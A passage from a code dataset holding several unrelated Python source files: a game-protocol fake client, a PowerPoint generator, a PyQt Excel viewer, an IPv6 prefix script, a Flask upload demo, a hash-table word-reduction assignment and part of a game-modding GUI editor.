for item in s.select('server_groups > group'):\n if item.get('ip') != \"\" and item.get('port') != 0:\n return (item.get('ip'), item.get('port'))\n\n\ndef cog_jp_signin(host, port, username, skey):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n # 8 NULL bytes to init the connection.\n sock.sendall(bytearray(8))\n\n ps = PacketStreamContext(SocketFileWrapper(sock))\n\n # Build the signin packet data.\n body = SignInRequest.build(dict(\n req_type='DLTSKEYSIGN:100',\n id=username,\n skey=skey,\n unk=''\n ))\n\n\n # Send the packet.\n ps.make_and_send_packet(body)\n\n # Get the response and parse it.\n pkt = ps.read_packet()\n \n return SignInResp.parse(pkt.data)\n\ndef cog_jp_read_entrance_server_list(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n # 8 NULL bytes to init the connection.\n sock.sendall(bytearray(8))\n\n # Encrypted packet with 'ALL+\\x00' body.\n ps = PacketStreamContext(SocketFileWrapper(sock))\n ps.make_and_send_packet(b'ALL+\\x00')\n\n # Read the response\n pkt = ps.read_packet()\n\n # Read the two binary8 parts.\n stream = io.BytesIO(pkt.data)\n (server_info_header, server_info_bytes) = read_binary8_part(stream)\n (user_info_header, user_info_bytes) = read_binary8_part(stream)\n stream.close()\n\n # Start parsing the server info.\n si_size = ServerInfo.sizeof()\n ci_size = ChannelInfo.sizeof()\n si_stream = io.BytesIO(server_info_bytes)\n # Loop over the server info structs.\n #print(server_info_header)\n\n servers = []\n for i in range(server_info_header.entry_count):\n si = ServerInfo.parse(si_stream.read(si_size))\n\n # Loop over the 
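For reference, the CSS selector in cog_jp_serverlist_get_first above behaves like this on a made-up server list; note that html.parser lowercases tag names and hands attribute values back as strings:

    from bs4 import BeautifulSoup

    xml = '<server_groups><group ip="1.2.3.4" port="8080"/></server_groups>'
    doc = BeautifulSoup(xml, features='html.parser')
    for item in doc.select('server_groups > group'):
        print(item.get('ip'), item.get('port'))   # '1.2.3.4' '8080' (both str)

Because port comes back as a string, a caller such as cog_jp_signin would need int(port) before socket.connect.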
channel info structs.\n #print(\"server #{}\".format(i))\n #print(si)\n #print(si.unk_str.decode('shift_jis'))\n channels = []\n for j in range(si.channel_count):\n #print(\"channel #{}\".format(j))\n ci = ChannelInfo.parse(si_stream.read(ci_size))\n channels.append(ci)\n #print(ci)\n\n servers.append((si, channels))\n\n return (servers, ps)","repo_name":"Future-of-Frontier/mhf-fake-client","sub_path":"jp.py","file_name":"jp.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16553244160","text":"from collections.abc import Container\nfrom pptx import Presentation\nfrom pptx.util import Inches\nfrom pptx.dml.color import RGBColor\n\nclass PPTGenerator:\n def __init__(self, contents) -> None:\n self.contents = contents\n\n def addTitleSlide(self, prs: Presentation) -> None:\n title_slide_layout = prs.slide_layouts[0]\n slide = prs.slides.add_slide(title_slide_layout)\n title = slide.shapes.title\n title.text = self.contents['heading']\n title.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n prs.save(self.contents[\"Presentation Name\"])\n\n def addTableOfContents(self, prs: Presentation) -> None:\n slide_layout = prs.slide_layouts[1]\n slide = prs.slides.add_slide(slide_layout)\n title_shape = slide.shapes.title\n title_shape.text = \"Contents\"\n title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n bullet_points = slide.shapes.placeholders[1]\n\n for subheading_dict in self.contents[\"subheadings\"]:\n subheading = subheading_dict[\"subheading\"]\n text_frame = bullet_points.text_frame\n p = text_frame.add_paragraph()\n p.text = subheading\n p.level = 0\n p.runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Blue color\n\n prs.save(self.contents[\"Presentation Name\"])\n\n def addTopicExplanation(self, prs: Presentation) -> None:\n slide_layout = prs.slide_layouts[1]\n\n for subheading_dict in self.contents[\"subheadings\"]:\n subheading = subheading_dict[\"subheading\"]\n content = subheading_dict[\"content\"]\n\n slide = prs.slides.add_slide(slide_layout)\n title_shape = slide.shapes.title\n title_shape.text = subheading\n title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n bullet_points = slide.shapes.placeholders[1]\n\n for explanation in content:\n text_frame = bullet_points.text_frame\n p = text_frame.add_paragraph()\n p.text = explanation\n p.level = 0\n p.runs[0].font.color.rgb = RGBColor(0, 0, 255) # Blue color\n\n prs.save(self.contents[\"Presentation Name\"])\n\n\nif __name__ == \"__main__\":\n import json\n\n # Load contents from the JSON file\n with open(\"static/1.json\", \"r\") as file:\n content = json.load(file)\n\n newContent = {\n \"Presentation Name\": \"static/Sample.pptx\",\n \"heading\": content[\"heading\"],\n \"subheadings\": content[\"subheadings\"]\n }\n\n MyPptGenerator = PPTGenerator(contents=newContent)\n prs = Presentation()\n MyPptGenerator.addTitleSlide(prs)\n MyPptGenerator.addTableOfContents(prs)\n MyPptGenerator.addTopicExplanation(prs)","repo_name":"shubpotadar/slidewizard","sub_path":"ppt.py","file_name":"ppt.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12295014509","text":"from PyQt5.QtWidgets import *\nimport sys\nimport openpyxl\n\n\nclass Main(QWidget):\n def __init__(self):\n super(Main,self).__init__()\n 
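A self-contained sketch of the python-pptx calls PPTGenerator relies on (file name and slide text are hypothetical). Incidentally, RGBColor(88, 24, 69) is a dark plum rather than the red the comments claim:

    from pptx import Presentation
    from pptx.dml.color import RGBColor

    prs = Presentation()
    slide = prs.slides.add_slide(prs.slide_layouts[1])   # title + content layout
    slide.shapes.title.text = "Demo"
    slide.shapes.title.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor(88, 24, 69)
    body = slide.shapes.placeholders[1].text_frame
    para = body.add_paragraph()
    para.text = "First bullet"
    prs.save("demo.pptx")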
self.setWindowTitle(\"Load Excel data to QtableWidget\")\n\n        layout = QVBoxLayout()\n        self.setLayout(layout)\n\n        self.table_Widget = QTableWidget()\n        layout.addWidget(self.table_Widget)\n\n        self.load_data()\n\n\n    def load_data(self):\n        path = \"list-countries-world.xlsx\"\n        workbook = openpyxl.load_workbook(path)\n        sheet = workbook.active # refer to the active sheet; an Excel file can hold several sheets and this picks the active one\n\n        self.table_Widget.setRowCount(sheet.max_row)\n        self.table_Widget.setColumnCount(sheet.max_column)\n\n        values = list(sheet.values) # all cell values in the sheet (a list of row tuples)\n        for value in values:\n            print(value) # sample of o/p :\n            '''# ('Rank', 'Country ', 'Population', '% of world pop.')\n            (0, 'World', 7135000000, 1)\n            (1, 'China', 1362010000, 0.191)\n            (2, 'India', 1238570000, 0.174)\n            (3, 'United States', 317400000, 0.0445)'''\n\n        self.table_Widget.setHorizontalHeaderLabels(values[0]) # set the header labels; note that row and column counts must already be set\n        ## the header now shows 4 titled columns, but every data row is still empty\n        ## we need to populate the table\n\n        #self.table_Widget.setItem(0,2,QTableWidgetItem(\"Hello\")) # would put \"Hello\" at row 1, column 3 (Population here)\n        row_index=0\n        for value_tuple in values[1:]: # start from 1 so the header row is not treated as data\n            col_index=0\n            for value in value_tuple:\n                self.table_Widget.setItem(row_index,col_index,QTableWidgetItem(str(value)))\n                col_index +=1\n\n            row_index +=1\n        # Walk each row and fill its columns one by one; once a row's columns\n        # are done, move on to the next row and repeat.\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    window = Main() ## window holds the instance of the Main class\n    window.showMaximized()\n    app.exec_()","repo_name":"Abdallah-Salama2/Python-GUI-Projects-for-beginners","sub_path":"Execl Viewer (pyqt5)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43982767967","text":"#! /usr/bin/env python3\n\nimport argparse\nimport ipaddress\nimport socket\n\nfrom jfscripts import __version__\n\n\ndef get_ipv6(dns_name):\n    result = socket.getaddrinfo(dns_name, port=None)\n\n    for entry in result:\n        #\n        # entry:\n        #\n        # (family, type, proto, canonname, sockaddr)\n        #\n        # (\n        #     ,\n        #     ,\n        #     0,\n        #     '',\n        #     ('2003:68:4c06:3300:1e98:ecff:fe0f:d330', 0, 0, 0)\n        # )\n        if entry[0] == 10 and entry[2] == 0:\n            return entry[4][0]\n\n\ndef get_parser():\n    \"\"\"The argument parser for the command line interface.\n\n    :return: An ArgumentParser object.\n    :rtype: argparse.ArgumentParser\n    \"\"\"\n    parser = argparse.ArgumentParser(description=\"Get the ipv6 prefix from a DNS name.\")\n\n    parser.add_argument(\n        \"dnsname\",\n        help=\"The DNS name, e. g. 
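The manual row_index/col_index bookkeeping in load_data above can be written with enumerate; an equivalent drop-in for the population loop:

    for row_index, value_tuple in enumerate(values[1:]):
        for col_index, value in enumerate(value_tuple):
            self.table_Widget.setItem(row_index, col_index, QTableWidgetItem(str(value)))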
josef-friedrich.de\",\n    )\n\n    parser.add_argument(\n        \"-V\",\n        \"--version\",\n        action=\"version\",\n        version=\"%(prog)s {version}\".format(version=__version__),\n    )\n\n    return parser\n\n\ndef main():\n    args = get_parser().parse_args()\n\n    ipv6 = get_ipv6(args.dnsname)\n\n    prefix = ipaddress.ip_network(ipv6 + \"/64\", strict=False)\n\n    print(prefix)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Josef-Friedrich/jfscripts","sub_path":"jfscripts/dns_ipv6_prefix.py","file_name":"dns_ipv6_prefix.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23560847490","text":"\"\"\"\nTask #1\nCreate a page with a \"Press me\" button; clicking it\ntakes the user to another page that greets them by name.\n\nTask #2\nCreate a page with an image and a link to another page\nthat shows a form for uploading images.\n\"\"\"\nfrom pathlib import PurePath, Path\nfrom flask import Flask, render_template, redirect, url_for, request\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\n\n@app.route('/hi/<name>')\ndef hi(name):\n    return render_template('hi.html', name=name)\n\n\n@app.get('/btn/')\ndef get_touch_me():\n    return render_template('form.html')\n\n\n@app.post('/btn/')\ndef post_touch_me():\n    name = request.form.get('name')\n    return redirect(url_for('hi', name=name))\n\n\n# @app.route('/image/')\n@app.route('/image/<file_name>')\ndef image(file_name):\n    image_path = PurePath.joinpath(Path.cwd(), 'static', 'uploads', file_name)\n    print(image_path)\n    return render_template('image.html', file_name=image_path)\n\n\n@app.get('/image_load/')\ndef get_image_load():\n    return render_template('image_load.html')\n\n\n@app.post('/image_load/')\ndef post_image_load():\n    file = request.files.get('file')\n    file_name = secure_filename(file.filename)\n    image_path = PurePath.joinpath(Path.cwd(), 'static', 'uploads', file_name)\n    file.save(image_path)\n    return redirect(url_for('image', file_name=file_name))\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"accountAirat/FlaskFastAPI","sub_path":"seminar/seminar2/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16291525892","text":"# File: Reducible.py\r\n\r\n# Description: This program is designed to find the longest word that could be a word \r\n# for any length, if the word was reduced by a letter at a time.\r\n\r\n# Student Name: Michael Pham\r\n\r\n# Student UT EID: mp46987\r\n\r\n# Partner Name:\r\n\r\n# Partner UT EID:\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 51125\r\n\r\n# Date Created: 3/21/22\r\n\r\n# Date Last Modified: 3/22/22\r\n \r\nimport sys\r\n\r\n# Input: takes as input a positive integer n\r\n# Output: returns True if n is prime and False otherwise\r\ndef is_prime ( n ):\r\n    if (n == 1):\r\n        return False\r\n\r\n    limit = int (n ** 0.5) + 1\r\n    div = 2\r\n    while (div < limit):\r\n        if (n % div == 0):\r\n            return False\r\n        div += 1\r\n    return True\r\n\r\n# Input: takes as input a string in lower case and the size\r\n# of the hash table \r\n# Output: returns the index the string will hash into\r\ndef hash_word (s, size):\r\n    hash_location = 0\r\n    for x in range (len(s)):\r\n        letter = ord (s[x]) - 96\r\n        hash_location = (hash_location * 26 + letter) % size\r\n    return hash_location\r\n\r\n# Input: takes as input a 
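What the /64 computation in main above yields for the sample address taken from the file's own comment:

    import ipaddress

    addr = '2003:68:4c06:3300:1e98:ecff:fe0f:d330'
    print(ipaddress.ip_network(addr + '/64', strict=False))   # 2003:68:4c06:3300::/64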
string in lower case and the constant\r\n# for double hashing \r\n# Output: returns the step size for that string \r\ndef step_size (s, const):\r\n return const - (hash_word(s, const))\r\n\r\n# Input: takes as input a string and a hash table \r\n# Output: no output; the function enters the string in the hash table, \r\n# it resolves collisions by double hashing\r\ndef insert_word (s, hash_table):\r\n \r\n index = hash_word(s, len(hash_table))\r\n if hash_table[index] == '':\r\n hash_table[index] = s\r\n else:\r\n #Establishing group for moving the index if filled\r\n group = 1\r\n step = step_size(s, 7)\r\n destination_index = (index + group * step) % len(hash_table)\r\n while (hash_table[destination_index]):\r\n #Run the while loop until we find an index that is not filled up\r\n destination_index = (index + group * step) % len(hash_table)\r\n group += 1\r\n #Establish the index\r\n hash_table[destination_index] = s\r\n \r\n \r\n# Input: takes as input a string and a hash table \r\n# Output: returns True if the string is in the hash table \r\n# and False otherwise\r\ndef find_word (s, hash_table):\r\n \r\n index = hash_word(s, len(hash_table))\r\n if hash_table[index] == s:\r\n return True\r\n else:\r\n #Establishing group for moving the index if filled\r\n group = 1\r\n step = step_size(s, 7)\r\n destination_index = (index + group * step) % len(hash_table)\r\n while (hash_table[destination_index] and hash_table[destination_index] != s):\r\n #Run the while loop until we find an index that is not filled up\r\n destination_index = (index + group * step) % len(hash_table)\r\n group += 1\r\n #Establish the index\r\n if hash_table[destination_index] == s:\r\n #Return if the hash table equals the index needed\r\n return True\r\n else:\r\n #False if not\r\n return False\r\n\r\n# Input: string s, a hash table, and a hash_memo \r\n# recursively finds if the string is reducible\r\n# Output: if the string is reducible it enters it into the hash memo \r\n# and returns True and False otherwise\r\ndef is_reducible (s, hash_table, hash_memo):\r\n\r\n #Establish a false off the bat assuming that the word is not reducible before we run our test\r\n reducible = False\r\n if len(s) == 1:\r\n if s == 'i' or s == 'o' or s == 'a':\r\n if find_word(s, hash_memo) is False:\r\n #If not placed in the hash memo yet do so here\r\n insert_word(s, hash_memo)\r\n return True\r\n if find_word(s, hash_memo) == True:\r\n #If runs through test then return True\r\n return True\r\n else:\r\n for x in already_reduced(s):\r\n if x != 'i' and x != 'o' and x != 'a' and find_word(x, hash_table) == False:\r\n continue\r\n elif is_reducible(x, hash_table, hash_memo) is True:\r\n if find_word(s, hash_memo) is False:\r\n insert_word(s, hash_memo)\r\n #Set new reducible value here\r\n reducible = True\r\n return reducible \r\n\r\n \r\ndef already_reduced(s):\r\n \r\n #Establish the already reduced list for the function\r\n reduced = []\r\n for x in range(len(s)):\r\n #Attaching the word together\r\n reduced.append(s[:x] + s[x + 1:]) \r\n return reduced\r\n\r\n\r\n# Input: string_list a list of words\r\n# Output: returns a list of words that have the maximum length\r\ndef get_longest_words (string_list):\r\n\r\n longest_word = 0\r\n #Create list\r\n longest_word_list = []\r\n for x in range(len(string_list)):\r\n addition = string_list[x]\r\n #Checking the next string in the list \r\n checklength = len(addition)\r\n \r\n if checklength == longest_word:\r\n #Append if it is the longest word we have \r\n 
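Two hand-checked examples for the helpers above (traced from the code, not from running it):

    print(already_reduced("cat"))   # -> ['at', 'ct', 'ca']
    print(hash_word("ab", 11))      # (0*26 + 1) % 11 = 1, then (1*26 + 2) % 11 = 6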
longest_word_list.append(addition)\r\n elif checklength < longest_word:\r\n #Just continue because it does not matter to us if we are not dealing with longest word\r\n continue \r\n elif checklength > longest_word:\r\n for y in range(len(longest_word_list)):\r\n longest_word_list.pop(0)\r\n #Remove to clear out the longest word list\r\n longest_word_list.append(addition)\r\n #Append if the word is longer than the current longest word \r\n longest_word = checklength\r\n return longest_word_list\r\n\r\n\r\n \r\n\r\ndef main():\r\n # create an empty word_list\r\n word_list = []\r\n # read words from words.txt and append to word_list\r\n #x = open('words.txt', 'r')\r\n #for line in x:\r\n #line = line.strip()\r\n for line in sys.stdin:\r\n line = line.strip() \r\n word_list.append (line)\r\n\r\n # find length of word_list\r\n length_list = len(word_list)\r\n\r\n # determine prime number N that is greater than twice\r\n # the length of the word_list\r\n greater_prime = length_list * 2 + 1\r\n while not is_prime(greater_prime):\r\n greater_prime += 2\r\n\r\n # create an empty hash_list\r\n hash_list = []\r\n\r\n # populate the hash_list with N blank strings\r\n for x in range(greater_prime):\r\n hash_list.append(\"\")\r\n\r\n # hash each word in word_list into hash_list\r\n # for collisions use double hashing \r\n for x in word_list:\r\n insert_word(x, hash_list)\r\n \r\n # create an empty hash_memo of size M\r\n # we do not know a priori how many words will be reducible\r\n # let us assume it is 10 percent (fairly safe) of the words\r\n # then M is a prime number that is slightly greater than \r\n # 0.2 * size of word_list\r\n hash_memo = []\r\n M = int(length_list * 0.2)\r\n while not(is_prime(M)):\r\n M += 1\r\n \r\n # populate the hash_memo with M blank strings\r\n hash_memo = ['' for x in range(M)]\r\n\r\n insert_word('i', hash_memo)\r\n insert_word('o', hash_memo)\r\n insert_word('a', hash_memo)\r\n \r\n # create an empty list reducible_words\r\n reducible_words = []\r\n\r\n # for each word in the word_list recursively determine\r\n # if it is reducible, if it is, add it to reducible_words\r\n # as you recursively remove one letter at a time check\r\n # first if the sub-word exists in the hash_memo. if it does\r\n # then the word is reducible and you do not have to test\r\n # any further. 
add \"the word to\" the hash_m\"emo.\r\n reducible_words = [x for x in word_list if is_reducible(x, hash_list, hash_memo) is True]\r\n \r\n # find the largest reducible words in reducible_words\r\n largest_reducible = get_longest_words(reducible_words)\r\n\r\n # print the reducible words in alphabetical order\r\n largest_reducible.sort()\r\n \r\n '''import time\r\n start = time.time()\r\n finish = time.time()\r\n print(\"Time: \" + str(finish - start))'''\r\n # one word per line\r\n for x in largest_reducible:\r\n print(x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"michaelpham995/Data-Structures","sub_path":"Reducible.py","file_name":"Reducible.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120892360","text":"from __future__ import annotations\n\n__all__ = [\"BaseFieldEditor\", \"FieldRow\"]\n\nimport abc\nimport logging\nimport typing as tp\nfrom ast import literal_eval\nfrom enum import IntEnum\n\nfrom soulstruct.exceptions import InvalidFieldValueError\nfrom soulstruct.base.game_types import BaseGameObject, GameObjectSequence, MapEntry, BaseParam\nfrom soulstruct.base.project.editors.base_editor import BaseEditor\nfrom soulstruct.base.project.links import WindowLinker\nfrom soulstruct.base.project.utilities import bind_events, NumberEditBox\nfrom soulstruct.utilities.text import camel_case_to_spaces\nfrom soulstruct.utilities.window import ToolTip\n\nif tp.TYPE_CHECKING:\n from soulstruct.base.project.core import GameDirectoryProject\n\n_LOGGER = logging.getLogger(__name__)\n\n\nFieldTypeTyping = tp.Union[tp.Type[BaseGameObject], tp.Type[GameObjectSequence], type, tp.Iterable]\n\n\nclass FieldRow:\n \"\"\"Container/manager for widgets in a single field row in the Editor.\n\n These are only created once, and their contents are refreshed when needed (e.g. when a new entry is selected).\n Unlike entries, field value widgets may be Labels (which turn into Entries for editing), Checkbuttons, or\n Comboboxes. 
Each of these widgets is created for each row, so they can be hidden/dispalyed when needed by a\n given field type, rather than dynamically creating and destroying them every time a new entry/category is\n selected.\n \"\"\"\n\n CAMEL_CASE_NICKNAMES = True\n\n def __init__(self, editor: BaseFieldEditor, row_index: int, main_bindings: dict = None):\n self.master = editor\n self.STYLE_DEFAULTS = editor.STYLE_DEFAULTS\n\n self.row_index = row_index\n self._active = False\n self._link_missing = False\n self.field_name = \"\"\n self.field_type = type # type: FieldTypeTyping\n self.field_nickname = \"\"\n self.field_docstring = \"\"\n self.field_links = []\n self.link_missing = False\n\n bg_color = self._get_color()\n\n self.row_box = editor.Frame(\n width=editor.FIELD_BOX_WIDTH,\n height=editor.FIELD_ROW_HEIGHT,\n bg=bg_color,\n row=row_index,\n columnspan=2,\n sticky=\"nsew\",\n )\n bind_events(self.row_box, main_bindings)\n\n self.field_name_box = editor.Frame(row=row_index, column=0, bg=bg_color, sticky=\"w\")\n bind_events(self.field_name_box, main_bindings)\n\n self.field_name_label = editor.Label(\n self.field_name_box,\n text=\"\",\n fg=editor.FIELD_NAME_FG,\n width=editor.FIELD_NAME_WIDTH,\n bg=bg_color,\n anchor=\"w\",\n font_size=10,\n )\n bind_events(self.field_name_label, main_bindings)\n\n self.value_box = editor.Frame(\n width=editor.FIELD_VALUE_BOX_WIDTH, row=row_index, column=1, bg=bg_color, sticky=\"ew\"\n )\n bind_events(self.value_box, main_bindings)\n\n # VALUE WIDGETS\n\n self.value_label = editor.Label(\n self.value_box, text=\"\", bg=bg_color, width=editor.FIELD_VALUE_WIDTH, anchor=\"w\"\n )\n bind_events(self.value_label, main_bindings)\n\n self.value_checkbutton = editor.Checkbutton(\n self.value_box,\n label=None,\n bg=bg_color,\n no_grid=True,\n selectcolor=\"#000\",\n command=self._checkbutton_toggle,\n )\n # Main focus bindings are not bound to Checkbutton.\n\n self.value_combobox = editor.Combobox(\n self.value_box,\n values=None,\n width=editor.FIELD_VALUE_WIDTH,\n no_grid=True,\n font=(\"Segoe UI\", 10),\n on_select_function=self._combobox_choice,\n )\n self.value_combobox.bind(\"\", lambda _: \"break\") # prevent scrolling on collapsed Combobox\n # Main focus bindings are not bound to Combobox.\n\n # TODO: BEHAVIOR_REF_TYPE combobox should also force a refresh, as it may change field names.\n # (Class will need access to ParamEntry for this, which is fine.)\n\n self.context_menu = editor.Menu(self.row_box)\n self.tool_tip = ToolTip(self.row_box, self.field_name_box, self.field_name_label, text=None)\n\n self.active_value_widget = self.value_label\n self.hide()\n\n def _combobox_choice(self, _=None):\n \"\"\"Updates field value with integer value from Combobox enum or unknown integer.\n\n Note that the Combobox's appearance needs no further updating.\n \"\"\"\n combobox_string = self.value_combobox.var.get()\n if combobox_string.startswith(\"Unknown: \"):\n value = int(combobox_string[len(\"Unknown: \"):])\n else:\n value = int(self.value_combobox.var.get().split(\" \")[0])\n self.master.change_field_value(self.field_name, value)\n\n def _activate_value_widget(self, widget):\n if id(self.active_value_widget) != id(widget):\n self.active_value_widget.grid_remove()\n self.active_value_widget = widget\n\n def _checkbutton_toggle(self):\n \"\"\"Modify appearance of Checkbutton when toggled.\"\"\"\n new_value = self.value_checkbutton.var.get()\n if self.master.change_field_value(self.field_name, new_value):\n self.value_checkbutton.config(fg=\"#3F3\" if new_value else 
\"#F33\", text=\"ON\" if new_value else \"OFF\")\n else:\n self.value_checkbutton.var.set(not new_value)\n\n def update_field(\n self,\n name,\n nickname,\n value: tp.Any,\n field_type: type,\n docstring=\"\",\n ):\n \"\"\"Update widgets with given field information.\n\n The `entry` argument is not used by this base class, but may be used by child methods.\n \"\"\"\n self.field_name = name\n self.field_type = field_type\n self.field_nickname = camel_case_to_spaces(nickname) if self.CAMEL_CASE_NICKNAMES else nickname\n self.field_docstring = docstring if docstring else \"DOC-TODO\"\n self.field_links = []\n\n if self.field_name_label.var.get() != self.field_nickname:\n self.field_name_label.var.set(self.field_nickname)\n\n self.update_field_value_display(value)\n\n self.tool_tip.text = self.field_docstring\n self.unhide()\n\n def _update_field_GameObjectSequence(self, value):\n if self.field_type.count != len(value):\n raise ValueError(\n f\"Length of value {value} does not match number of objects in `GameObjectSequence` for field \"\n f\"{self.field_name}.\"\n )\n self.field_links = []\n for value_i in value:\n if value_i is not None:\n self.field_links += self.master.get_field_links(self.field_type.game_object_type, value_i)\n valid_count = sum(v is not None for v in value)\n self._set_linked_value_label(f\"<{valid_count} entries>\", multiple_hint=\"{MULTIPLE}\")\n\n def _update_field_GameObject(self, value):\n self.field_links = self.master.get_field_links(self.field_type, value)\n self._update_field_int(value)\n\n def _update_field_IntEnum(self, value):\n self.value_combobox[\"values\"] = [f\"{e.value} {camel_case_to_spaces(e.name)}\" for e in self.field_type]\n try:\n enum_name = getattr(self.field_type(value), \"name\")\n except ValueError:\n value_text = f\"Unknown: {value}\"\n else:\n value_text = f\"{value} {camel_case_to_spaces(enum_name)}\"\n self.value_combobox.var.set(value_text)\n self._activate_value_widget(self.value_combobox)\n\n def _update_field_int(self, value):\n self._set_linked_value_label(str(value))\n\n def _update_field_float(self, value):\n self._set_linked_value_label(f\"{value:.3f}\")\n\n def _update_field_bool(self, value):\n if value not in {0, 1}:\n raise ValueError(f\"Field with 'bool' type has non-boolean value: {value}\")\n self.value_checkbutton.var.set(value)\n self.value_checkbutton.config(fg=\"#3F3\" if value else \"#F33\", text=\"ON\" if value else \"OFF\")\n self._activate_value_widget(self.value_checkbutton)\n\n def _update_field_list(self, value):\n \"\"\"Actual list of values (e.g. draw groups).\"\"\"\n # Convert sets (e.g. 
draw/display/navmesh groups) to sorted lists so empty sets appear pretty.\n value_text = repr(sorted(value)) if not isinstance(value, list) else repr(value)\n self.value_label.var.set(value_text)\n self._activate_value_widget(self.value_label)\n\n @property\n def field_update_method(self) -> tp.Callable:\n \"\"\"Returns the appropriate update method for the current field type.\"\"\"\n\n # First, look for a method defined for this specific type.\n try:\n field_type_name = self.field_type.__name__\n except AttributeError:\n raise AttributeError(f\"Could not detect name of field type {self.field_type}.\")\n try:\n return getattr(self, f\"_update_field_{field_type_name}\")\n except AttributeError:\n pass\n\n # Try a super-type method.\n if issubclass(self.field_type, str):\n return self._set_linked_value_label\n if issubclass(self.field_type, GameObjectSequence):\n return self._update_field_GameObjectSequence\n if issubclass(self.field_type, BaseGameObject):\n return self._update_field_GameObject\n if issubclass(self.field_type, IntEnum):\n return self._update_field_IntEnum\n\n raise AttributeError(f\"Could not find field update method '_update_field_{field_type_name}' or a superclass.\")\n\n def _set_linked_value_label(self, value_text, multiple_hint=\"{AMBIGUOUS}\"):\n if self.field_links:\n if len(self.field_links) > 1:\n value_text += f\" {multiple_hint}\"\n if any(link.name is None for link in self.field_links):\n value_text += \" {BROKEN LINK}\"\n else:\n value_text += f\" {{{self.field_links[0].name}}}\"\n if self.value_label.var.get() != value_text:\n self.value_label.var.set(value_text) # TODO: probably redundant in terms of update efficiency\n self._activate_value_widget(self.value_label)\n\n def _set_field_fg(self, value):\n \"\"\"Color field text ('fg') depending on whether value is some default that shouldn't draw attention.\"\"\"\n if self._is_default(self.field_type, value, self.field_nickname):\n self.field_name_label[\"fg\"] = self.master.FIELD_NAME_FG_DEFAULT\n self.value_label[\"fg\"] = self.master.FIELD_VALUE_FG_DEFAULT\n else:\n self.field_name_label[\"fg\"] = self.master.FIELD_NAME_FG\n self.value_label[\"fg\"] = self.master.FIELD_VALUE_FG\n\n def hide(self):\n \"\"\"Called when this row has no field to display (e.g. 
for smaller ParamTables or unselected entry).\"\"\"\n self.row_box.grid_remove()\n self.field_name_box.grid_remove()\n self.field_name_label.grid_remove()\n self.value_box.grid_remove()\n self.active_value_widget.grid_remove()\n\n def unhide(self):\n self.row_box.grid()\n self.field_name_box.grid()\n self.field_name_label.grid()\n self.value_box.grid()\n self.active_value_widget.grid()\n\n def build_field_context_menu(self):\n self.context_menu.delete(0, \"end\")\n\n if self.field_links:\n for field_link in self.field_links:\n field_link.add_to_context_menu(self.context_menu)\n\n # Users can enter their own custom integer values for IntEnums.\n if issubclass(self.field_type, IntEnum):\n self.context_menu.add_command(label=\"Set custom integer value\", command=self._set_custom_intenum_value)\n\n @property\n def editable(self):\n return self.active_value_widget is self.value_label\n\n def _string_to_GameObjectSequence(self, string):\n try:\n new_value = literal_eval(string)\n if isinstance(new_value, tuple):\n new_value = list(new_value)\n elif not isinstance(new_value, list):\n raise SyntaxError\n except SyntaxError:\n raise ValueError(f\"Value of field {self.field_nickname} should be a list of strings or numbers.\")\n game_object_type = self.field_type.game_object_type\n for new_value_i in new_value:\n if new_value_i is None:\n continue # None is valid for any type.\n if issubclass(game_object_type, BaseParam) and not isinstance(new_value_i, int):\n raise ValueError(f\"Found non-integer {game_object_type} value in sequence: {new_value_i}\")\n elif issubclass(game_object_type, MapEntry) and not isinstance(new_value_i, str):\n raise ValueError(f\"Found non-string {game_object_type} name in sequence: {new_value_i}\")\n return new_value\n\n def _string_to_GameObject(self, string):\n # Assume all non-`MapEntry` fields use integers (e.g. `BaseParam`, `Text`).\n if issubclass(self.field_type, MapEntry):\n return string\n else:\n try:\n return int(string)\n except ValueError:\n raise InvalidFieldValueError(\n f\"Value of field {self.field_nickname} must be an integer ({self.field_type}).\"\n )\n\n def _string_to_int(self, string):\n if not string.strip(\"-\"):\n return None # no change\n try:\n return int(string)\n except ValueError:\n raise InvalidFieldValueError(f\"Value of field {self.field_nickname} must be an integer.\")\n\n def _string_to_float(self, string):\n if not string.strip(\"-\"):\n return None # no change\n try:\n return float(string)\n except ValueError:\n raise InvalidFieldValueError(f\"Value of field {self.field_nickname} must be a float.\")\n\n def _string_to_list(self, string):\n \"\"\"At the moment, all elements of `list`-type fields must be integers.\"\"\"\n try:\n new_value = literal_eval(string)\n if isinstance(new_value, tuple):\n new_value = list(new_value)\n elif not isinstance(new_value, list):\n raise SyntaxError\n if not all(isinstance(i, int) for i in new_value):\n raise SyntaxError\n except (SyntaxError, ValueError):\n raise InvalidFieldValueError(\n f\"Value of field {self.field_nickname} must be a list of integers, e.g. 
